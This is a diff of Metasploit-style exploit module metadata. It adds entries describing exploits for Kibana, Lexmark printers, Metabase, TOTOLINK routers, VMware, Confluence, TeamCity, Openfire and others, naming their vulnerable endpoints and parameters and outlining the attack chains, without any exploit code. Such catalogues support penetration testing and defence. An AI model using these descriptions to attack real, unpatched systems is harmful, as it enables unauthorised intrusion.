"description": "Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer.\n An attacker with access to the Timelion application could send a request that will attempt to execute\n javascript code. This leads to an arbitrary command execution with permissions of the\n Kibana process on the host system.\n\n Exploitation will require a service or system reboot to restore normal operation.\n\n The WFSDELAY parameter is crucial for this exploit. Setting it too high will cause MANY shells\n (50-100+), while setting it too low will cause no shells to be obtained. WFSDELAY of 10 for a\n docker image caused 6 shells.\n\n Tested against kibana 6.5.4.",
"references": [
"URL-https://github.com/mpgn/CVE-2019-7609",
"URL-https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/",
"CVE-2019-7609"
],
"platform": "Unix",
"arch": "cmd",
"rport": 5601,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2023-09-01 20:34:35 +0000",
"path": "/modules/exploits/linux/http/kibana_timelion_prototype_pollution_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/kibana_timelion_prototype_pollution_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-service-down"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"ioc-in-logs"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/kibana_upgrade_assistant_telemetry_rce": {
"name": "Kibana Upgrade Assistant Telemetry Collector Prototype Pollution",
"fullname": "exploit/linux/http/kibana_upgrade_assistant_telemetry_rce",
"aliases": [
],
"rank": 0,
"disclosure_date": "2020-04-17",
"type": "exploit",
"author": [
"h00die",
"Alex Brasetvik (alexbrasetvik)"
],
"description": "Kibana before version 7.6.3 suffers from a prototype pollution bug within the\n Upgrade Assistant. By setting a new constructor.prototype.sourceURL value we're\n able to execute arbitrary code.\n Code execution is possible through two different ways. Either by sending data\n directly to Elastic, or using Kibana to submit the same queries. Either method\n enters the polluted prototype for Kibana to read.\n\n Kibana will either need to be restarted, or collection happens (unknown time) for\n the payload to execute. Once it does, cleanup must delete the .kibana_1 index\n for Kibana to restart successfully. Once a callback does occur, cleanup will\n happen allowing Kibana to be successfully restarted on next attempt.",
"references": [
"URL-https://hackerone.com/reports/852613"
],
"platform": "Linux",
"arch": "cmd",
"rport": 9200,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"ELASTIC",
"KIBANA"
],
"mod_time": "2023-10-06 09:55:10 +0000",
"path": "/modules/exploits/linux/http/kibana_upgrade_assistant_telemetry_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/kibana_upgrade_assistant_telemetry_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-service-down"
],
"Reliability": [
],
"SideEffects": [
"ioc-in-logs"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/klog_server_authenticate_user_unauth_command_injection": {
"name": "Klog Server authenticate.php user Unauthenticated Command Injection",
"fullname": "exploit/linux/http/klog_server_authenticate_user_unauth_command_injection",
@@ -66303,6 +67577,69 @@
"session_types": false,
"needs_cleanup": true
},
"exploit_linux/http/lexmark_faxtrace_settings": {
"name": "Lexmark Device Embedded Web Server RCE",
"fullname": "exploit/linux/http/lexmark_faxtrace_settings",
"aliases": [
],
"rank": 600,
"disclosure_date": "2023-03-13",
"type": "exploit",
"author": [
"James Horseman",
"Zach Hanley",
"jheysel-r7"
],
"description": "A unauthenticated Remote Code Execution vulnerability exists in the embedded webserver in certain Lexmark devices through 2023-02-19.\n The vulnerability is only exposed if, when setting up the printer or device, the user selects \"Set up Later\" when asked\n if they would like to add an Admin user. If no Admin user is created the endpoint `/cgi-bin/fax_change_faxtrace_settings`\n is accessible without authentication. The endpoint allows the user to configure a number of different fax settings.\n\n A number of the configurable parameters on the page (ex. `FT_Custom_lbtrace`) fail to be sanitized properly before being\n used in an bash eval statement: `eval \"$cmd\" > /dev/null`, allowing for an unauthenticated user to run arbitrary commands.",
"references": [
"URL-https://github.com/horizon3ai/CVE-2023-26067",
"URL-https://publications.lexmark.com/publications/security-alerts/CVE-2023-26068.pdf",
"URL-https://www.horizon3.ai/lexmark-command-injection-vulnerability-zdi-can-19470-pwn2own-toronto-2022/",
"CVE-2023-26068"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Unix (In-Memory)"
],
"mod_time": "2023-09-06 15:47:54 +0000",
"path": "/modules/exploits/linux/http/lexmark_faxtrace_settings.rb",
"is_install_path": true,
"ref_name": "linux/http/lexmark_faxtrace_settings",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
],
"Reliability": [
"repeatable-session"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/librenms_addhost_cmd_inject": {
"name": "LibreNMS addhost Command Injection",
"fullname": "exploit/linux/http/librenms_addhost_cmd_inject",
@@ -67137,6 +68474,68 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/metabase_setup_token_rce": {
"name": "Metabase Setup Token RCE",
"fullname": "exploit/linux/http/metabase_setup_token_rce",
"aliases": [
],
"rank": 600,
"disclosure_date": "2023-07-22",
"type": "exploit",
"author": [
"h00die",
"Maxwell Garrett",
"Shubham Shah"
],
"description": "Metabase versions before 0.46.6.1 contain a flaw where the secret setup-token\n is accessible even after the setup process has been completed. With this token\n a user is able to submit the setup functionality to create a new database.\n When creating a new database, an H2 database string is created with a TRIGGER\n that allows for code execution. We use a sample database for our connection\n string to prevent corrupting real databases.\n\n Successfully tested against Metabase 0.46.6.",
"references": [
"URL-https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/",
"URL-https://www.metabase.com/blog/security-advisory",
"CVE-2023-38646"
],
"platform": "Unix",
"arch": "cmd",
"rport": 3000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2023-08-08 15:35:50 +0000",
"path": "/modules/exploits/linux/http/metabase_setup_token_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/metabase_setup_token_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"ioc-in-logs"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/microfocus_obr_cmd_injection": {
"name": "Micro Focus Operations Bridge Reporter Unauthenticated Command Injection",
"fullname": "exploit/linux/http/microfocus_obr_cmd_injection",
@@ -68954,6 +70353,69 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/opentsdb_key_cmd_injection": {
"name": "OpenTSDB 2.4.1 unauthenticated command injection",
"fullname": "exploit/linux/http/opentsdb_key_cmd_injection",
"aliases": [
],
"rank": 600,
"disclosure_date": "2023-07-01",
"type": "exploit",
"author": [
"Gal Goldstein",
"Daniel Abeles",
"Erik Wynter"
],
"description": "This module exploits an unauthenticated command injection\n vulnerability in the key parameter in OpenTSDB through\n 2.4.1 (CVE-2023-36812/CVE-2023-25826) in order to achieve\n unauthenticated remote code execution as the root user.\n\n The module first attempts to obtain the OpenTSDB version via\n the api. If the version is 2.4.1 or lower, the module\n performs additional checks to obtain the configured metrics\n and aggregators. It then randomly selects one metric and one\n aggregator and uses those to instruct the target server to\n plot a graph. As part of this request, the key parameter is\n set to the payload, which will then be executed by the target\n if the latter is vulnerable.\n\n This module has been successfully tested against OpenTSDB\n version 2.4.1.",
"references": [
"URL-https://github.com/OpenTSDB/opentsdb/security/advisories/GHSA-76f7-9v52-v2fw",
"CVE-2023-36812",
"CVE-2023-25826"
],
"platform": "Linux",
"arch": "ARCH_CMD",
"rport": 4242,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux"
],
"mod_time": "2023-09-07 17:29:16 +0000",
"path": "/modules/exploits/linux/http/opentsdb_key_cmd_injection.rb",
"is_install_path": true,
"ref_name": "linux/http/opentsdb_key_cmd_injection",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
],
"Reliability": [
"repeatable-session"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/opentsdb_yrange_cmd_injection": {
"name": "OpenTSDB 2.4.0 unauthenticated command injection",
"fullname": "exploit/linux/http/opentsdb_yrange_cmd_injection",
@@ -70869,6 +72331,68 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/solarview_unauth_rce_cve_2023_23333": {
"name": "SolarView Compact unauthenticated remote command execution vulnerability.",
"fullname": "exploit/linux/http/solarview_unauth_rce_cve_2023_23333",
"aliases": [
],
"rank": 600,
"disclosure_date": "2023-05-15",
"type": "exploit",
"author": [
"h00die-gr3y <h00die.gr3y@gmail.com>"
],
"description": "CONTEC's SolarView™ Series enables you to monitor and visualize solar power and is only available in Japan.\n This module exploits a command injection vulnerability on the SolarView Compact `v6.00` web application\n via vulnerable endpoint `downloader.php`.\n After exploitation, an attacker will have full access with the same user privileges under\n which the webserver is running (typically as user `contec`).",
"references": [
"CVE-2023-23333",
"URL-https://attackerkb.com/topics/kE3lzTZGV2/cve-2023-23333"
],
"platform": "Linux,PHP,Unix",
"arch": "php, cmd, armle, x64",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"PHP",
"Unix Command",
"Linux Dropper"
],
"mod_time": "2023-09-05 17:06:01 +0000",
"path": "/modules/exploits/linux/http/solarview_unauth_rce_cve_2023_23333.rb",
"is_install_path": true,
"ref_name": "linux/http/solarview_unauth_rce_cve_2023_23333",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"ioc-in-logs",
"artifacts-on-disk"
]
},
"session_types": false,
"needs_cleanup": true
},
"exploit_linux/http/sonicwall_cve_2021_20039": {
"name": "SonicWall SMA 100 Series Authenticated Command Injection",
"fullname": "exploit/linux/http/sonicwall_cve_2021_20039",
@@ -72143,6 +73667,69 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/totolink_unauth_rce_cve_2023_30013": {
"name": "TOTOLINK Wireless Routers unauthenticated remote command execution vulnerability.",
"fullname": "exploit/linux/http/totolink_unauth_rce_cve_2023_30013",
"aliases": [
],
"rank": 600,
"disclosure_date": "2023-05-05",
"type": "exploit",
"author": [
"h00die-gr3y <h00die.gr3y@gmail.com>",
"Kazamayc https://github.com/Kazamayc"
],
"description": "Multiple TOTOLINK network products contain a command insertion vulnerability in setting/setTracerouteCfg.\n This vulnerability allows an attacker to execute arbitrary commands through the \"command\" parameter.\n After exploitation, an attacker will have full access with the same user privileges under\n which the webserver is running (typically as user `root`, ;-).\n\n The following TOTOLINK network products and firmware are vulnerable:\n - Wireless Gigabit Router model X5000R with firmware X5000R_V9.1.0u.6118_B20201102.zip;\n - Wireless Gigabit Router model A7000R with firmware A7000R_V9.1.0u.6115_B20201022.zip;\n - Wireless Gigabit Router model A3700R with firmware A3700R_V9.1.2u.6134_B20201202.zip;\n - Wireless N Router model N200RE V5 with firmware N200RE_V5_V9.3.5u.6095_B20200916.zip;\n - Wireless N Router model N200RE V5 with firmware N200RE_V5_V9.3.5u.6139_B20201216.zip;\n - Wireless N Router model N350RT with firmware N350RT_V9.3.5u.6095_B20200916.zip;\n - Wireless N Router model N350RT with firmware N350RT_V9.3.5u.6139_B20201216.zip;\n - Wireless Extender model EX1200L with firmware EX1200L_V9.3.5u.6146_B20201023.zip; and\n - probably more looking at the scale of impacted devices :-(",
"references": [
"CVE-2023-30013",
"URL-https://attackerkb.com/topics/xnX3I3PEgM/cve-2023-30013",
"URL-https://github.com/Kazamayc/vuln/tree/main/TOTOLINK/X5000R/2"
],
"platform": "Linux,Unix",
"arch": "cmd, mipsle",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Unix Command",
"Linux Dropper"
],
"mod_time": "2023-09-20 22:14:48 +0000",
"path": "/modules/exploits/linux/http/totolink_unauth_rce_cve_2023_30013.rb",
"is_install_path": true,
"ref_name": "linux/http/totolink_unauth_rce_cve_2023_30013",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"ioc-in-logs",
"artifacts-on-disk"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/tp_link_ncxxx_bonjour_command_injection": {
"name": "TP-Link Cloud Cameras NCXXX Bonjour Command Injection",
"fullname": "exploit/linux/http/tp_link_ncxxx_bonjour_command_injection",
@@ -73284,6 +74871,137 @@
"session_types": false,
"needs_cleanup": true
},
"exploit_linux/http/vmware_vrli_rce": {
"name": "VMware vRealize Log Insight Unauthenticated RCE",
"fullname": "exploit/linux/http/vmware_vrli_rce",
"aliases": [
],
"rank": 600,
"disclosure_date": "2023-01-24",
"type": "exploit",
"author": [
"Horizon3.ai Attack Team",
"Ege BALCI <egebalci@pm.me>"
],
"description": "VMware vRealize Log Insights versions v8.x contains multiple vulnerabilities, such as\n directory traversal, broken access control, deserialization, and information disclosure.\n When chained together, these vulnerabilities allow a remote, unauthenticated attacker to\n execute arbitrary commands on the underlying operating system as the root user.\n\n This module achieves code execution via triggering a `RemotePakDownloadCommand` command\n via the exposed thrift service after obtaining the node token by calling a `GetConfigRequest`\n thrift command. After the download, it will trigger a `PakUpgradeCommand` for processing the\n specially crafted PAK archive, which then will place the JSP payload under a certain API\n endpoint (pre-authenticated) location upon extraction for gaining remote code execution.\n\n Successfully tested against version 8.0.2.",
"references": [
"ZDI-23-116",
"ZDI-23-115",
"CVE-2022-31706",
"CVE-2022-31704",
"CVE-2022-31711",
"URL-https://www.horizon3.ai/vmware-vrealize-log-insight-vmsa-2023-0001-technical-deep-dive",
"URL-https://www.vmware.com/security/advisories/VMSA-2023-0001.html"
],
"platform": "Linux,Unix",
"arch": "x86, x64",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"VMware vRealize Log Insight < v8.10.2"
],
"mod_time": "2023-09-12 10:16:13 +0000",
"path": "/modules/exploits/linux/http/vmware_vrli_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/vmware_vrli_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"ioc-in-logs",
"artifacts-on-disk"
]
},
"session_types": false,
"needs_cleanup": true
},
"exploit_linux/http/vmware_vrni_rce_cve_2023_20887": {
"name": "VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE",
"fullname": "exploit/linux/http/vmware_vrni_rce_cve_2023_20887",
"aliases": [
],
"rank": 600,
"disclosure_date": "2023-06-07",
"type": "exploit",
"author": [
"Sina Kheirkhah",
"Anonymous with Trend Micro Zero Day Initiative",
"h00die"
],
"description": "VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection\n when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a\n remote unauthenticated attacker to execute arbitrary commands on the underlying operating system\n as the root user. The RPC interface is protected by a reverse proxy which can be bypassed.\n VMware has evaluated the severity of this issue to be in the Critical severity range with a\n maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the\n context of 'root' on the appliance.\n VMWare 6.x version are vulnerable.\n\n This module exploits the vulnerability to upload and execute payloads gaining root privileges.\n Successfully tested against version 6.8.0.",
"references": [
"CVE-2023-20887",
"URL-https://www.vmware.com/security/advisories/VMSA-2023-0012.html",
"URL-https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/",
"URL-https://github.com/sinsinology/CVE-2023-20887"
],
"platform": "Linux,Unix",
"arch": "cmd, x64",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Unix (In-Memory)",
"Linux Dropper"
],
"mod_time": "2023-07-20 16:40:28 +0000",
"path": "/modules/exploits/linux/http/vmware_vrni_rce_cve_2023_20887.rb",
"is_install_path": true,
"ref_name": "linux/http/vmware_vrni_rce_cve_2023_20887",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"ioc-in-logs",
"artifacts-on-disk"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/vmware_vrops_mgr_ssrf_rce": {
"name": "VMware vRealize Operations (vROps) Manager SSRF RCE",
"fullname": "exploit/linux/http/vmware_vrops_mgr_ssrf_rce",
@@ -73581,6 +75299,71 @@
"session_types": false,
"needs_cleanup": true
},
"exploit_linux/http/wd_mycloud_unauthenticated_cmd_injection": {
"name": "Western Digital MyCloud unauthenticated command injection",
"fullname": "exploit/linux/http/wd_mycloud_unauthenticated_cmd_injection",
"aliases": [
],
"rank": 600,
"disclosure_date": "2016-12-14",
"type": "exploit",
"author": [
"Erik Wynter",
"Steven Campbell",
"Remco Vermeulen"
],
"description": "This module exploits authentication bypass (CVE-2018-17153) and\n command injection (CVE-2016-10108) vulnerabilities in Western\n Digital MyCloud before 2.30.196 in order to achieve\n unauthenticated remote code execution as the root user.\n\n The module first performs a check to see if the target is\n WD MyCloud. If so, it attempts to trigger an authentication\n bypass (CVE-2018-17153) via a crafted GET request to\n /cgi-bin/network_mgr.cgi. If the server responds as expected,\n the module assesses the vulnerability status by attempting to\n exploit a commend injection vulnerability (CVE-2016-10108) in\n order to print a random string via the echo command. This is\n done via a crafted POST request to /web/google_analytics.php.\n\n If the server is vulnerable, the same command injection vector\n is leveraged to execute the payload.\n\n This module has been successfully tested against Western Digital\n MyCloud version 2.30.183.\n\n Note: based on the available disclosures, it seems that the\n command injection vector (CVE-2016-10108) might be exploitable\n without the authentication bypass (CVE-2018-17153) on versions\n before 2.21.126. The obtained results on 2.30.183 imply that\n the patch for CVE-2016-10108 did not actually remove the command\n injection vector, but only prevented unauthenticated access to it.",
"references": [
"CVE-2016-10108",
"CVE-2018-17153",
"URL-https://www.securify.nl/advisory/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges/",
"URL-https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/"
],
"platform": "Linux,Unix",
"arch": "armle, cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Unix In-Memory",
"Linux Dropper"
],
"mod_time": "2023-07-27 23:09:50 +0000",
"path": "/modules/exploits/linux/http/wd_mycloud_unauthenticated_cmd_injection.rb",
"is_install_path": true,
"ref_name": "linux/http/wd_mycloud_unauthenticated_cmd_injection",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
],
"Reliability": [
"repeatable-session"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/webcalendar_settings_exec": {
"name": "WebCalendar 1.2.4 Pre-Auth Remote Code Injection",
"fullname": "exploit/linux/http/webcalendar_settings_exec",
@@ -80445,7 +82228,7 @@
"Unix Command",
"Linux Dropper"
],
"mod_time": "2022-06-23 16:28:10 +0000",
"mod_time": "2023-09-12 12:20:34 +0000",
"path": "/modules/exploits/linux/misc/nimbus_gettopologyhistory_cmd_exec.rb",
"is_install_path": true,
"ref_name": "linux/misc/nimbus_gettopologyhistory_cmd_exec",
@@ -82700,6 +84483,83 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/ssh/vmware_vrni_known_privkey": {
"name": "VMWare Aria Operations for Networks (vRealize Network Insight) SSH Private Key Exposure",
"fullname": "exploit/linux/ssh/vmware_vrni_known_privkey",
"aliases": [
],
"rank": 600,
"disclosure_date": "2023-08-29",
"type": "exploit",
"author": [
"h00die",
"SinSinology",
"Harsh Jaiswal ( <Harsh Jaiswal (@rootxharsh)>",
"Rahul Maini ( <Rahul Maini (@iamnoooob)>"
],
"description": "VMWare Aria Operations for Networks (vRealize Network Insight) versions 6.0.0 through 6.10.0\n do not randomize the SSH keys on virtual machine initialization. Since the key is easily\n retrievable, an attacker can use it to gain unauthorized remote access as the \"support\" (root) user.",
"references": [
"CVE-2023-34039",
"URL-https://github.com/sinsinology/CVE-2023-34039",
"URL-https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/",
"URL-https://www.vmware.com/security/advisories/VMSA-2023-0018.html"
],
"platform": "Unix",
"arch": "cmd",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"6.0_platform",
"6.0_proxy",
"6.1_platform",
"6.1_proxy",
"6.2_collector",
"6.2_platform",
"6.3_collector",
"6.3_platform",
"6.4_collector",
"6.4_platform",
"6.5_collector",
"6.5_platform",
"6.6_collector",
"6.6_platform",
"6.7_collector",
"6.7_platform",
"6.8_collector",
"6.8_platform",
"6.9_collector",
"6.9_platform",
"6.10_collector",
"6.10_platform",
"All"
],
"mod_time": "2023-10-23 06:54:38 +0000",
"path": "/modules/exploits/linux/ssh/vmware_vrni_known_privkey.rb",
"is_install_path": true,
"ref_name": "linux/ssh/vmware_vrni_known_privkey",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"ioc-in-logs"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/ssh/vyos_restricted_shell_privesc": {
"name": "VyOS restricted-shell Escape and Privilege Escalation",
"fullname": "exploit/linux/ssh/vyos_restricted_shell_privesc",
@@ -86548,7 +88408,7 @@
"Unix Command",
"Linux Dropper"
],
"mod_time": "2023-04-17 13:01:30 +0000",
"mod_time": "2023-08-08 14:47:14 +0000",
"path": "/modules/exploits/multi/http/adobe_coldfusion_rce_cve_2023_26360.rb",
"is_install_path": true,
"ref_name": "multi/http/adobe_coldfusion_rce_cve_2023_26360",
@@ -87132,7 +88992,7 @@
"author": [
"Graeme Robinson"
],
"description": "This module uses the NiFi API to create an ExecuteProcess processor that will execute OS commands. The API must\n be unsecured (or credentials provided) and the ExecuteProcess processor must be available. An ExecuteProcessor\n processor is created then is configured with the payload and started. The processor is then stopped and\n deleted.",
"description": "This module uses the NiFi API to create an ExecuteProcess processor that will execute OS commands. The API must\n be unsecured (or credentials provided) and the ExecuteProcess processor must be available. An ExecuteProcessor\n processor is created then is configured with the payload and started. The processor is then stopped and\n deleted.\n\n Verified against 1.12.1, 1.12.1-RC2, and 1.20.0",
"references": [
"URL-https://nifi.apache.org/",
"URL-https://github.com/apache/nifi",
@@ -87160,7 +89020,7 @@
"Unix (In-Memory)",
"Windows (In-Memory)"
],
"mod_time": "2021-02-24 20:24:57 +0000",
"mod_time": "2023-08-28 17:39:02 +0000",
"path": "/modules/exploits/multi/http/apache_nifi_processor_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/apache_nifi_processor_rce",
@@ -87177,6 +89037,9 @@
"SideEffects": [
"ioc-in-logs",
"config-changes"
],
"NOCVE": [
"abusing a feature"
]
},
"session_types": false,
@@ -87476,6 +89339,66 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_multi/http/atlassian_confluence_rce_cve_2023_22515": {
"name": "Atlassian Confluence Unauthenticated Remote Code Execution",
"fullname": "exploit/multi/http/atlassian_confluence_rce_cve_2023_22515",
"aliases": [
],
"rank": 600,
"disclosure_date": "2023-10-04",
"type": "exploit",
"author": [
"sfewer-r7"
],
"description": "This module exploits an improper input validation issue in Atlassian Confluence, allowing arbitrary HTTP\n parameters to be translated into getter/setter sequences via the XWorks2 middleware and in turn allows for\n Java objects to be modified at run time. The exploit will create a new administrator user and upload a\n malicious plugins to get arbitrary code execution. All versions of Confluence between 8.0.0 through to 8.3.2,\n 8.4.0 through to 8.4.2, and 8.5.0 through to 8.5.1 are affected.",
"references": [
"CVE-2023-22515",
"URL-https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis",
"URL-https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html"
],
"platform": "",
"arch": "",
"rport": 8090,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2023-10-18 09:53:46 +0000",
"path": "/modules/exploits/multi/http/atlassian_confluence_rce_cve_2023_22515.rb",
"is_install_path": true,
"ref_name": "multi/http/atlassian_confluence_rce_cve_2023_22515",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"ioc-in-logs"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_multi/http/atlassian_confluence_webwork_ognl_injection": {
"name": "Atlassian Confluence WebWork OGNL Injection",
"fullname": "exploit/multi/http/atlassian_confluence_webwork_ognl_injection",
@@ -91478,6 +93401,67 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_multi/http/jetbrains_teamcity_rce_cve_2023_42793": {
"name": "JetBrains TeamCity Unauthenticated Remote Code Execution",
"fullname": "exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793",
"aliases": [
],
"rank": 600,
"disclosure_date": "2023-09-19",
"type": "exploit",
"author": [
"sfewer-r7"
],
"description": "This module exploits an authentication bypass vulnerability to achieve unauthenticated remote code execution\n against a vulnerable JetBrains TeamCity server. All versions of TeamCity prior to version 2023.05.4 are\n vulnerable to this issue. The vulnerability was originally discovered by SonarSource.",
"references": [
"CVE-2023-42793",
"URL-https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793/rapid7-analysis",
"URL-https://blog.jetbrains.com/teamcity/2023/09/critical-security-issue-affecting-teamcity-on-premises-update-to-2023-05-4-now/"
],
"platform": "Linux,Windows",
"arch": "cmd",
"rport": 8111,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows",
"Linux"
],
"mod_time": "2023-09-28 13:13:12 +0000",
"path": "/modules/exploits/multi/http/jetbrains_teamcity_rce_cve_2023_42793.rb",
"is_install_path": true,
"ref_name": "multi/http/jetbrains_teamcity_rce_cve_2023_42793",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"ioc-in-logs"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_multi/http/jira_hipchat_template": {
"name": "Atlassian HipChat for Jira Plugin Velocity Template Injection",
"fullname": "exploit/multi/http/jira_hipchat_template",
@@ -94286,7 +96270,7 @@
"Windows x86 (Native Payload)",
"Linux x86 (Native Payload)"
],
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-07-14 12:47:04 +0000",
"path": "/modules/exploits/multi/http/openfire_auth_bypass.rb",
"is_install_path": true,
"ref_name": "multi/http/openfire_auth_bypass",
@@ -94298,6 +96282,68 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_multi/http/openfire_auth_bypass_rce_cve_2023_32315": {
"name": "Openfire authentication bypass with RCE plugin",
"fullname": "exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315",
"aliases": [
],
"rank": 600,
"disclosure_date": "2023-05-26",
"type": "exploit",
"author": [
"h00die-gr3y <h00die.gr3y@gmail.com>"
],
"description": "Openfire is an XMPP server licensed under the Open Source Apache License.\n Openfire's administrative console, a web-based application, was found to be vulnerable to a path traversal attack\n via the setup environment. This permitted an unauthenticated user to use the unauthenticated Openfire Setup Environment\n in an already configured Openfire environment to access restricted pages in the Openfire Admin Console reserved for\n administrative users.\n This module will use the vulnerability to create a new admin user that will be used to upload a Openfire management plugin\n weaponised with java native payload that triggers an RCE.\n This vulnerability affects all versions of Openfire that have been released since April 2015, starting with version 3.10.0.\n The problem has been patched in Openfire release 4.7.5 and 4.6.8, and further improvements will be included in the\n first version on the 4.8 branch, which is version 4.8.0.",
"references": [
"CVE-2023-32315",
"URL-https://attackerkb.com/topics/7Tf5YGY3oT/cve-2023-32315",
"URL-https://github.com/miko550/CVE-2023-32315",
"URL-https://github.com/igniterealtime/Openfire/security/advisories/GHSA-gw42-f939-fhvm"
],
"platform": "Java",
"arch": "java",
"rport": 9090,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Java Universal"
],
"mod_time": "2023-07-18 08:38:06 +0000",
"path": "/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb",
"is_install_path": true,
"ref_name": "multi/http/openfire_auth_bypass_rce_cve_2023_32315",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
],
"Reliability": [
"repeatable-session"
]
},
"session_types": false,
"needs_cleanup": null
},
